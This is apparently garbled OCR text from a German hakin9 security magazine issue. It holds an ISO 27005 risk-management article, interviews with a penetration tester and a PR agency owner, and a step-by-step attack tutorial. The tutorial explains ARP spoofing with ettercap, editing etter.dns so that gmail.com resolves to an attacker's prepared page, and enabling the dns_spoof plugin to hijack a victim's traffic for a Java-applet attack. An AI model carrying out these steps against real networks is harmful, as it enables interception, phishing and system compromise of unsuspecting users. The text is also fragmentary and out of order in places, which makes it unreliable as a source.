les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso 